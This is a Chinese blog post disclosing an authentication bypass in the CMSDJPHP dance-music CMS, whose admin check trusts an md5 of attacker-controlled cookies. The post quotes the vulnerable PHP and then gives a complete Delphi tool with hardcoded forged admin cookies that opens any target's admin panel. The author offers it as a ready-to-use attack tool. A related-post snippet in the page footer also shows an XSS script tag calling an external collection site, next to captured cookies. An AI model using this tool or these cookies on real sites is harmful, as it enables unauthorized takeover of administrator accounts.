CMSDJPHP 七禧舞曲管理系统cookies欺骗漏洞 0day

最新推荐文章于 2021-04-02 03:03:46 发布
最新推荐文章于 2021-04-02 03:03:46 发布
阅读量3k 收藏
点赞数
分类专栏: Delphi 个人挫品 PHP漏洞 七禧0day
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MichaelJScofield/article/details/8395512
版权
Delphi 同时被 3 个专栏收录
15 篇文章 0 订阅
订阅专栏
个人挫品
11 篇文章 0 订阅
订阅专栏
PHP漏洞
1 篇文章 0 订阅
订阅专栏

本人首发于T00ls,转一份来自己博客。转载请注明出处。

微博:http://weibo.com/yinyongyou

应该是通杀所有PHP版本 。最新版本没有测试。从补丁来看,漏洞依然存在。
这是一个神级漏洞,体现了程序员的神逻辑。

看代码


admin/admin_check.php 
<?php





$CD_Version='V1.0';

$CD_Build='20100501';

function admincheck($CD_Permission){

if($_COOKIE['CD_Permission']<>''){

$menuarr=explode(',',$_COOKIE['CD_Permission']);

$adminlogined='False';

for($i=0;$i<count($menuarr);$i++){

if($menuarr[$i]==$CD_Permission){$adminlogined='True';}

}

if($adminlogined=='False'){AdminAlert('出错了,您没有进入本页面的权限!','',2);}

}else{

AdminAlert('出错了,您没有进入本页面的权限!','',2);

}

}

if(empty($_COOKIE['CD_AdminID'])){

AdminAlert('您没有进入本页面的权限,本次操作已被记录!','admin_login.php',0);

}elseif($_COOKIE['CD_Login']!=md5($_COOKIE['CD_AdminID'].$_COOKIE['CD_AdminUserName'].$_COOKIE['CD_AdminPassWord'].$_COOKIE['CD_Permission'])){//亮点在这句

AdminAlert('您没有进入本页面的权限,本次操作已被记录!','admin_login.php',0);

}

刚刚看的官网最新补丁,注释了两条无关的代码而已: 
$CD_Version="V1.1";

$CD_Build="20121208";





	//if(!eregi($_SERVER['SERVER_NAME'],$_SERVER['HTTP_REFERER'])){

	//	echo "<br><p align=center><font color='red' style='font-size:9pt'>对不起,为了系统安全,不允许直接输入地址访问本系统的后台管理页面。</font></p>";

	//	exit();   

	//}





	function admincheck($CD_Permission){

		if($_COOKIE['CD_Permission']<>""){

			$menuarr=explode(",",$_COOKIE['CD_Permission']);

			$adminlogined="False";

			for($i=0;$i<count($menuarr);$i++){

				if($menuarr[$i]==$CD_Permission){$adminlogined="True";}

			}

			//if($adminlogined=="False"){AdminAlert("出错了,您没有进入本页面的权限!","",2);}

		}else{

			//AdminAlert("出错了,您没有进入本页面的权限!","",2);

		}

	}





	if(empty($_COOKIE['CD_AdminID'])){

		AdminAlert("您没有进入本页面的权限,本次操作已被记录!","admin_login.php",0);

	}elseif($_COOKIE['CD_Login']!=md5($_COOKIE['CD_AdminID'].$_COOKIE['CD_AdminUserName'].$_COOKIE['CD_AdminPassWord'].$_COOKIE['CD_Permission'])){

		AdminAlert("您没有进入本页面的权限,本次操作已被记录!","admin_login.php",0);

	}



利用,自己构造一个能让它计算正确的cookies,实在不知道安装一个系统。然后登陆一次。提取自己的cookies。使用delphi 画个webbrowser控件,设置下cookies,傻瓜化工具就诞生了。 
unit uMain;

{

   T00ls首发

}





interface





uses

  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

  Dialogs, bsSkinData, BusinessSkinForm, bsSkinCtrls, OleCtrls, SHDocVw,

  StdCtrls, Mask, bsSkinBoxCtrls,MSHTML;





type

  TfrmMyFish = class(TForm)

    bsBusinessSkinForm1: TbsBusinessSkinForm;

    bsCompressedStoredSkin1: TbsCompressedStoredSkin;

    bsSkinData1: TbsSkinData;

    pnlContorl: TbsSkinPanel;

    pnlBrowser: TbsSkinPanel;

    wbAdmin: TWebBrowser;

    lblURL: TbsSkinStdLabel;

    edtURL: TbsSkinEdit;

    btnGo: TbsSkinSpeedButton;

    lblFishAdmin: TbsSkinStdLabel;

    edtFishAdmin: TbsSkinEdit;

    pnlLoading: TbsSkinPanel;

    GaugeLoading: TbsSkinGauge;

    lblLoading: TbsSkinStdLabel;

    procedure btnGoClick(Sender: TObject);

    procedure FormResize(Sender: TObject);

    procedure FormCreate(Sender: TObject);

    procedure wbAdminProgressChange(Sender: TObject; Progress,

      ProgressMax: Integer);

  private

    { Private declarations }

  public

    { Public declarations }

  end;





const

  COOKIE_HEAD = 'CD_Login=1df476c11ce215ad5a402afe5f370148; ';

  COOKIE_PASS = 'CD_AdminID=1; CD_AdminUserName=admin; CD_AdminPassWord=7622f895d131b0155232085e7b4a7654; CD_Permission=1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11; ';

var

  frmMyFish: TfrmMyFish;

  Doc: IHTMLDocument2;

  IsTrue: Boolean;

  iP: Integer;





implementation





{$R *.dfm}





function EncDecCode(Text:String; XorPass: Integer): String;

var

  i, Len: integer;

begin

  Result:='';

  Len := StrLen(Pchar(Text));

  for i := 1 to Len do

  begin

    Result := Result + Chr(Ord(Text[i]) xor XorPass);

  end;

end;





function XCode(Str:String):String;

begin

  Result:='';

  Result:=PChar(EncDecCode(Str,12));

end;





procedure TfrmMyFish.btnGoClick(Sender: TObject);

var

  sCookies: string;

  sList: TStrings;

  i: Integer;

begin

  sCookies := COOKIE_HEAD + COOKIE_PASS;

  lblLoading.Caption := '正在努力···';

  pnlBrowser.Visible := False;

  pnlLoading.Visible := True;

  wbAdmin.Navigate(edtURL.Text);

  repeat

    Application.ProcessMessages;

    Sleep(50);

  until not wbAdmin.Busy;

  Doc := wbadmin.Document as IHTMLDocument2;

  sList := TStringList.Create;

  try

    sList.CommaText := sCookies;

    for i:=0 to sList.Count-1 do

    begin

      Doc.cookie := sList.Strings[i];

    end;

    pnlBrowser.Visible := True;

    pnlLoading.Visible := False;

    wbAdmin.Refresh;

  finally

    sList.Free;

  end;

end;





procedure TfrmMyFish.FormResize(Sender: TObject);

begin

  edtURL.Width := pnlContorl.Width - 150 - 100;

  btnGo.Left := pnlContorl.Width - 75;

  GaugeLoading.Width := pnlLoading.Width div 100 * 70;

  GaugeLoading.Left := (pnlLoading.Width - GaugeLoading.Width) div 2;

  GaugeLoading.Top  := pnlLoading.Height div 2 - 100;

  lblLoading.Width := pnlLoading.Width div 100 * 70;

  lblLoading.Left :=  (pnlLoading.Width - GaugeLoading.Width) div 2;

  lblLoading.Top :=  pnlLoading.Height div 2 + 50;

end;





procedure TfrmMyFish.FormCreate(Sender: TObject);

begin

  pnlBrowser.Visible := False;

  pnlBrowser.Align := alClient;

  wbAdmin.Align    := alClient;

  pnlLoading.Visible := True;

  pnlLoading.Align := alClient;

  GaugeLoading.Value := 0;

  lblLoading.Caption := '初始化完毕。';

end;





procedure TfrmMyFish.wbAdminProgressChange(Sender: TObject; Progress,

  ProgressMax: Integer);

begin

  if ProgressMax<>0 then

  begin

    iP:=Progress*100 div ProgressMax;

    GaugeLoading.Value := iP;

  end else;

end;





end.
MichaelScofield
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php版程氏音乐cms管理系统 v3.0后台登录_csdjcms(程氏舞曲管理系统) V 3.0 getshell 漏洞...
weixin_40004051的博客
12-21 909
漏洞作者:Knife/*******************************************************//* csdjcms < V 3.0 getshell Vulnerability/* ========================/* By: : Kn1f3/* E-Mail : 681796@qq.com/*=============...
舞曲管理系统 v3.0 商业版.rar
07-05
舞曲管理系统修改完美版 1:加入会员正在试听功能 2:主页可加51代码 3:修正后台不能恢复数据库的错误 4:采集系统项目管理,可一步采集 5:支持flv等视频格式加入盗连优酷网播放器 --------------------------...
【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
【封神台 - 掌控安全靶场】尤里的复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
舞曲 php,CMSDJPHP舞曲管理系统cookies欺骗漏洞 0day
weixin_27885313的博客
03-13 196
应该是通杀所有PHP版本 。最新版本没有测试。从补丁来看,漏洞依然存在。这是一个神级漏洞,体现了程序员的神逻辑。看代码admin/admin_check.php$CD_Version='V1.0';$CD_Build='20100501';function admincheck($CD_Permission){if($_COOKIE['CD_Permission']<>''){$men...
php后台,CMSDJPHP舞曲管理系统cookies欺骗漏洞 0day
weixin_34618077的博客
04-02 203
本人首发于T00ls,转一份来自己博客。转载请注明出处。微博:http://weibo.com/yinyongyou 应该是通杀所有PHP版本 。最新版本没有测试。从补丁来看,漏洞依然存在。这是一个神级漏洞,体现了程序员的神逻辑。看代码admin/admin_check.php$CD_Version='V1.0';$CD_Build='20100501';function admincheck($...
舞曲管理系统PHP版1.1完美无错版
01-02
【七舞曲管理系统PHP版1.1】是一款专为舞曲网站设计的管理平台,其核心在于提供高效、稳定且易用的后台操作界面,帮助管理员便捷地管理和发布各类舞曲资源。这款系统基于PHP编程语言开发,适应了互联网上PHP技术的...
舞曲管理系统 V3.0 免费版.rar
07-05
 注意:本地调试,请使用系统自带的IIS调试..使用其他小型IIS软件,可能会导致功能不能正常使用!!!  Data/Cache 文件夹需要写入权限  Include/CmsDj.Config.asp 文件需要写入权限  Upload 文件夹需要写入权限 ...
舞曲管理系统PHP版1.1完美版
05-15
舞曲管理系统PHP版1.1完美版http://item.taobao.com/item.htm?id=10351765789
舞曲管理系统修改版 v1.0
10-18
本程序是七舞曲管理系统修改版 1:增加了可发布新闻 2:修复批量更新歌曲 3:增加服务组设置 4:增加网盘上传MP3 5:增加友情链接功能 6:优化歌曲内容 后台地址:/admin 帐号 admin 密码 admin 验证码 ...
asp舞曲管理系统v2.0
07-26
最新版的2.0程序集合了以前1.2和1.1的所有优点,重新修改了会员系统,强大的后台可以生成html,asp,htm,aspx 系统新加入视听目录后台修改,重多优点集一体,相信很多用过七舞曲管理系统的朋友会喜欢~! 后台地址:admin/login.asp 后台帐号:admin 后台密码:admin
cxjw音乐舞曲管理程序
03-19
七喜的PHP-VIP版 首先在这里告诉大家,这个版本还存在一个功能缺陷,就是后台添加不到音乐,所有的音乐要到会员中心那里上传。 我知道很多人问我为什么会这样。告诉大家,这套程序本身就是这样的。(在此我也希望有能力的朋友帮助完成后台添加的功能。) 其他的功能我都测试了完整,PHP文件曾经给很多为了赚钱的“黑人”用微盾PHP加密工具加密过,有的还用函数混乱加密方式加密了。 但是一套程序存在金钱利益就会失去了它本身的意义。同时我也希望“萝卜老乡”谅解。 解密这套完整的PHP程序不容易的。由于文件很多。 1。访问安装http://你站的域名/install/index.php 2。填写你的MYSQL数据库的资料 3。完成安装 在此提醒大家,这套东西要求的服务器系统要WINDOWS也就是支持ASP的服务器或者空间PHP组件 模板那些东西我会增加上去的。 有问题可以去www.qikez.com或者blog.qikez.com 我的QQ空间留言 感谢你们了。 程序破解:FLY QQ47346888 群:86546258
CMSDj播放器
09-30
本播放器由JS控制的,一款Dj网站专用的播放器,可避免同时出现2个声音!
CMSDJ模板 很不错的。
03-26
CMSDJ模板 很不错的。 美观大方。安装简单。请下载后看说明。
发一个自己封装的Asp Dll文件
01-17 748
调试程序和做程序的时候,好多重复的代码一直输入很麻烦,也很没有效率,封装一个自己的Asp包包,挺有有的下载个精简版的VB6.0,新建 ActiveX dll,以下是封装的代码,重要部分都有注释,不懂可以跟帖Option ExplicitPublic Resp As Response, Requ As Request, Appl As Application, Serv As Server, Ses
dj网站php源码,Thinkphp 二次开发mixdj风格舞曲程序 DJ网站程序自适应
weixin_29120409的博客
03-13 3663
Thinkphp二次开发mixdj风格舞曲程序,DJ舞曲网站程序,模板自适应,适合做大型舞曲网站。安装说明:1、上传程序到网站根目录;2、导入mixdj.sql数据库;3、修改根目录下的config.php文件里面的mysql连接参数;4、后台地址:http://www.xxx.com/dada;5、后台用户名:admin 密码:admin888;6、批量上传的音乐放到Import目录下面进行扫描...
防止直接输入URL进入系统的办法
Ezrealmore
03-29 5233
1.将不允许直接访问的jsp页面放到WEB-INF目录下,将注册、登录等允许直接访问的页面放到webroot下。 访问WEB-INF目录下的jsp页面 通过struts2的result访问(也是转发) 请求转发访问 jsp的forward标签:<jsp:forward page="/WEB-INF/MyJsp.jsp"/> redirect无法访问,页面中放a herf 也无法访问。2.通
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值